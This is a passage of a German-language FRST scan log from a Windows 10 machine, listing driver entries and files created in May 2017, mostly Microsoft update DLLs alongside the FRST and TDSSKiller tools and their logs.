S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-21 21:24 - 2017-05-21 21:24 - 00020202 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-21 21:04 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:56 - 2017-05-21 20:56 - 00000000 ___HD C:\OneDriveTemp
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-21 21:24 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
